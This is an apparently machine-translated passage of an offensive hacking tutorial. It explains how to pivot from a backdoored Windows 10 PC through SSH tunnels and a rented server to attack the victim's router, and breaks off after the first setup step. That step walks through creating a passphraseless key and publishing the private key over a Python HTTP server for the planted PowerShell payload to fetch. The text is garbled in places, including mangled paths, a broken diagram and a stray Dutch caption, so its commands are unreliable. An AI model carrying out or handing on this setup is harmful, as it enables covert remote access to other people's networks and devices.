Without administrator privileges, installing additional software, or changing the Windows 10 firewall, an attacker can change a router and perform different types of exploits. It is accomplished by forwarding requests from Kali through a back door Windows computer to the router gateway with simple SSH tunnels.
The attack that I will outline benefits from the SSH -R and -L port forwarding options to make encrypted connections to and from the attacker's server. The diagram below provides a simplified representation of the attack.
# Attack Topology [Kali/Hacker] | | SSH | | / & # 39; [Debian/Server] . / | | SSH + -> [Raspberry Pi on 192.168.1.2:8080] | / | / [Windows 10/Proxy] ----> [Router/Target on 192.168.1.1:80] + -> [Torrent Client on 192.168.1.3:8080]
The connections allow the attacker to forward requests through a virtual private server (Debian) and then through a compromised Windows 10 PC, ultimately allowing the attacker access to the router gateway. Other devices and ports on the network can be targeted through the Windows 10 computer, but we'll focus on the router. An attacker who has access to router settings can do all kinds of damage.
The PowerShell payload runs in Windows 10, which requires it to make an SSH connection to the attacker's server. That link forwards requests from the server through Windows 10 to the router gateway. To access the forwarding port in the Debian VPS, the attacker also connects to the server, allowing it to use this and Windows 10 as a dual forwarding mechanism.
Similar attacks can be performed with Tor that allow better access to devices and ports on the target network. But I wanted to come up with a forwarding solution that didn't include administrator rights, third party software, opening ports in Windows 10 or changing firewalls.
The environment can be set up with Kali Linux and Windows 10 on a shared Wi-Fi network. In such scenarios, the attacker may attempt to access a service using the Windows 10 IP address to bypass IP filtering or whitelisting. However, that is a specific and less practical case. For that reason, our demonstration will use a virtual private server, allowing an attacker to hack the router remotely through two systems from any network in the world.
Step 1: Configure the Debian Server
First of all, SSH in the virtual private server used as root in the attack. The server IP address is shown as 126.96.36.199 in the rest of this tutorial.
Create a new SSH key pair with the following ssh-keygen command. If prompted for a password, leave it blank and press Enter on the keyboard. The key pair passphrase must be empty for the attack to work.
By default, the ssh-keygen prompt will try to name the new keys "id_rsa". Change it to any string like "ab56ab49226ed8603e9ae41e242d8096" to thwart potential directory crawlers.
Warning: The file name "key" will be used for the rest of this demonstration for simplicity, but it is generally not a good practice. Web crawlers that can list the "key" file have full remote access to the Debian server.
~ # ssh-keygen Generating a public / private RSA key pair. Enter the file in which to store the key (/root/.ssh/id_rsa): /root/.ssh/key Directory & # 39; /root/.ssh' made. Enter passphrase (empty for no passphrase): Enter the same passphrase again: Your identification is stored in /root/.ssh/key. Your public key is stored in /root/.ssh/key.pub. The main fingerprint is: SHA256: 5M9KVJVlW2o2er4MSaW0 + 5yyFhqhKm51kAfrt / fEnbA root @ debian9 The randomart image of the key is: + --- [RSA 2048] ---- + | .oo. | | . ... + | | +. . . B | | + o .... B. | | . oS. . *. | | o. + o.o.O. | | . + .. ooE. + | | o .... o.o = o | | o .. .. ooo * | + ---- [SHA256] ----- +
Then go to the ~ / .ssh folder.
~ # cd ~ / .ssh
View the files in the folder; there must be a public (.pub) and a private key.
~ / .ssh # ls -la -rw ------- 1 root root 1675 March 24 05:26 key -rw-r - r-- 1 root root 391 March 24 05:26 key.pub
Copy the public key to a file named "authorized_keys". That gives any SSH client (ie Windows 10) with the private key the ability to authenticate to the SSH server.
~ / .ssh # cp key.pub authorizedkeys
Modify the "sshd_config" file to disable password authentication. Only clients with the private key can authenticate with the server after the change. It is an essential step because password authentication can prevent the hacked Windows client from being properly verified.
~ / .ssh # nano / etc / ssh / sshd_config
Set the "PasswordAuthentication" option to "no" and remove the line if necessary. Save and exit nano by pressing Ctrl + x then y and Enter .
Now reboot the SSH server with the command systemctl .
~ / .ssh # systemctl restart ssh
In the .ssh / directory, create a blank "index.html" file to prevent the following HTTP server from saving the files in the directory.
~ / .ssh # touch index.html
Make the keys available for the internet with the following screen commands and python3 . Screen allows the Python3 HTTP server to persist long after the SSH connection is lost.
~ / .ssh # screen python3 -m http.server 80 Control HTTP on 0.0.0.0 port 80 ...
To disconnect from the screen session without ending the Python3 server, press Control-A and then D . Then close the SSH session.
To ensure that the SSH server is configured correctly, a few things can be done.
Open Firefox on a local Kali machine. and navigate to the server's IP address or domain name. The server is displaying a blank page because of the empty index.html file created in the previous step. Download the / key from the URL bar. <19659035 · Hacking Windows 10: SSH-tunnels gebruiken om verzoeken door te sturen en externe routers te hacken " width="480" height="480" style="max-width:532px;height:auto;"/>